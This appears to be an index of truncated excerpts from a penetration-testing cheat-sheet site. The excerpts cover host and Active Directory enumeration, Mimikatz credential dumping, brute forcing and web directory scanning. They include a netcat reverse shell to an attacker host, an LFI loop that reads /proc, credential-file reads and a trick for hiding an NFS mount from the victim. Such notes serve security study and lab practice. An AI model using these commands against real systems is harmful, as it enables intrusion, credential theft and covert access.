-
See also the Web brute force post.
-
If your console is narrow, widen it at the beginning: stty rows 50 cols 200 Consider to directly spawn another reverse shell: nc -e /bin/sh $attackerip 4444 & Basic enumeration about the host idgroupscat /etc/passwdcat /etc/groupcat /etc/hostscat /etc/fstabuname -a // Check for kernel exploits // ALSO search for kernel exploits with OS name! // If this…
-
dir General: Usual commands: Therefore: Remember to use dir /R /as /ah -force. tree Start with creating a list of all directories and files. Download it. It’s way easier to look in a local editor and it’s stored for the future as well. tree c:\ > C:\Windows\Temp\dsys\dirs.txtdir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt(Download the files)…
-
General system enumeration Get general information about the OS: systeminfo Get the environment variabes: set Enumerate cached credentials: cmdkey /list If the current system is not known yet, try to determine the version via one of the following files: Processes enumeration tasklist /Vtasklist /V | find "cmd.exe" // Search for a commandtasklist /V /fi "USERNAME eq NT…
-
Enumeration Check the certificate Perform SSL-Scan Go to Checklist 80 HTTP Optional if vulnerable against heartbleed, use msf> use openssl_heartbleed. Don’t forget to use set ACTION KEYS or similar (see info)
-
Enumeration Mandatory Check anonymous login Try to create AND upload a file: mkdir test put /tmp/test test Check login with at least the following credentials: admin / admin admin / password Optional Download everything with wget and look for .dot files! Check login with newly found users Brute-force login Make sure to check admin / admin and other usual combinations…
-
Automates Windows enumeration. Github page Usage Seatbelt.exe -group=all Run Seatbelt.exe without arguments to see possible parameters. Example Seatbelt.exe OSInfo Processes Remote From another Windows system, seatbelt can connect to a victim and perform commands there. Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber Command aggregation There are already some groups defined which perform multiple tests at once. Seatbelt.exe -group=system [-computername=...]Seatbelt.exe…
-
Source on Github Creates screenshots from a list of URLs. Good way to get fast an overwiew over a new site. With nmap, use ‑oA file to save the output also as XML file. EyeWitness can use this file via ‑x file and make screenshots of all of this sites. EyeWitness.py --web -x webservers.xml
-
The usual order Network scan Detect hosts for a domain (use Seclist): for ip in $(cat common-subdomains.txt); do host $ip.megacorpone.com; done Reverse lookup: Find domains for addresses: for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found" Zonefile enumeration Grab zonefile from a random target domain: host -a -l fraunhofer.de ns3.fraunhofer.de…
-
For reverse engineering Devicename Content /proc/$pid/maps Shows the mempory mapping of a process. Includes all used libraries. /proc/self/loginuid Own UID. Read processes If you can read /proc via a LFI: #!/bin/bash for i in {1..1024} do echo $i curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i done The, look in the /tmp/proc directory for files > 0 byte. Read environment of…
-
Try this ressources if you can access files, but not listing them. http://pwnwiki.io/#!presence/windows/blind.md Cheat sheet 1 List In Apache and probably more systems you can “travel over” non-existing files because the path is shortened before checking the existence of a file. Example: /test/test.txt/../../index.html will return in an Apache the root’s index.html even if the test direcory and…
-
Enumeration Mandatory Optional Tools
-
Windows creates and stores credentials in the Local Security Authority Subsystem Service LSASS in the memory. On the filesystem, the sam database stores the hashes. Use Mimikatz Usage Enable debug mode. This usess the SeDebugPrivilege so that we are able to communicate with other processes. privilege:debug Try to elevate privileges to obtain SYSTEM user privileges:…
-
BloodHound analyzes and present Active Directory Data. SharpHound is the data collector which runs on a compromised AD system. On the target: On the own system:
-
Collection of privsec scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the github site for all commands. General enumeration powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users Enumerates all users. Get-NetUser Enumerate all users which does not require Kerberos preauth. Get-NetUser -PreauthNotRequired Returns…
-
See the Impacket site for a short description of all tools. Tip: On Kali, use the command impacket-* Enumeration without authentication Determine the system architecture getArch.py -target $target Returns the listening RPC interface IDs. ifmap.py $target 135rpcdump.py $target Enumeration with half authentication Scenario: You have credentials for one AD user. Then, try to get all users for…
-
Checklist A domain of a DC consists out of the following elements: An object in AD may have a set of ACE Access Control Entries which is called ACL Access Control List. An object’s ACE can be retrieved in PS with Get-ObjectAcl [-Identity| $object. The SCM Service Control Manager contains a database of installed services…
-
Ports: ldap 389/tcp ldaps 636/tcp globalldap/globalcatldap 3268/tcp globalldaps/globalcatldapssl 3269/tcp Enumerate without credentials Nmap enumeration scans nmap -n -sV --script "ldap* and not brute" $target Ldapsearch scan ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to LDAPs/GlobalLDAPs: openssl s_client -connect $target:636 </dev/null openssl s_client -connect $target:3269 </dev/null Search in the directory: ldapsearch -x -b…
-
Connect from the command line mongo 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace' Show databases show dbs Switch to database use <db> Show all collections (“tables”) show collections Show all entries from a collection db.<collection>.find() Add a document db.products.insert( { item: "card", qty: 15 } ) Injections Show all records of the current table, assuming there is a WHERE clause for one field.…
-
Tools to detect nmap ‑O nmap-chronos Tools to detect and validate p0f JS to list browser characteristics which could send back to an attacker via an AJAX request: /itsec/wp-content/uploads/2021/05/browser_detection.html Tools to impersonate Against browser/JS-based fingerprinting: Just tamper with values from the browser in about:config.
-
Enumeration Mandatory Optional On Windows
-
With Medusa Doesn’t seem to work with virtual hosts! medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/~Public -T 2 With ncrack Doesn’t seem to work with virtual hosts! ncrack -vv --user bethany -P Dog_Names_normalized.txt http://10.11.1.49:9505 -m http:path=/~Public/ With metasploit Use module auxiliary/scanner/http/http_login Virtual hosts If Host headers are not supported: More
-
Download: https://github.com/droope/droopescan droopescan scan drupal -u http://$target/ -t 32 Or just install via pip pip install droopescan
-
https://tools.kali.org/exploitation-tools/commix Created SQL injections on the fly.
-
Directory enumeration Hints: General search nikto -host $victim gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 HTTP_PROXY="socks4://127.0.0.1:9990/" gobuster dir -u http://$target/…
-
Displays all available network shares: showmount -e $target Normal mount mount -t nfs $target:/home /mnt Mounting with nfspy — with the hide option, it mounts and unmounts for the server so the victim cannot see the new connection via showmount. nfspy -o server=192.168.1.124:/home,hide,allow_other,ro,intr /mnt Mount via SSH ssh -N -L 3049:localhost:2049 user@hostname mount -t nfs -o port=3049…
-
tcp/135 udp/135 — and as (Microsoft) Remote Procedure Call on tcp/593 as web service. Enumeration Obtain general information # rpcinfo -p $target # rpcinfo -s $target Connect. Hint: auto completion works; enum<tab> returns all enum commands. rpcclient -U "" $target Enumerate through all API endpoints with one of the following options. python /usr/local/bin/rpcdump.py $target |…
-
Enumeration Aktuell angemeldete Benutzer anzeigen finger @ip Benutzer-Enumeration for username in $(cat cirt-default-usernames.txt); do finger $username@10.10.10.76 >> /tmp/finger; done Enumeration mit Metasploit: msf5 > use auxiliary/scanner/finger/finger_users msf5 auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76 rhosts => 10.10.10.76 msf5 auxiliary(scanner/finger/finger_users) > run Exploits Auf sehr alten Systemen konnte man https://insecure.org/sploits_all.html zufolge Befehle ausführen, etwa mit finger "|/bin/id@host'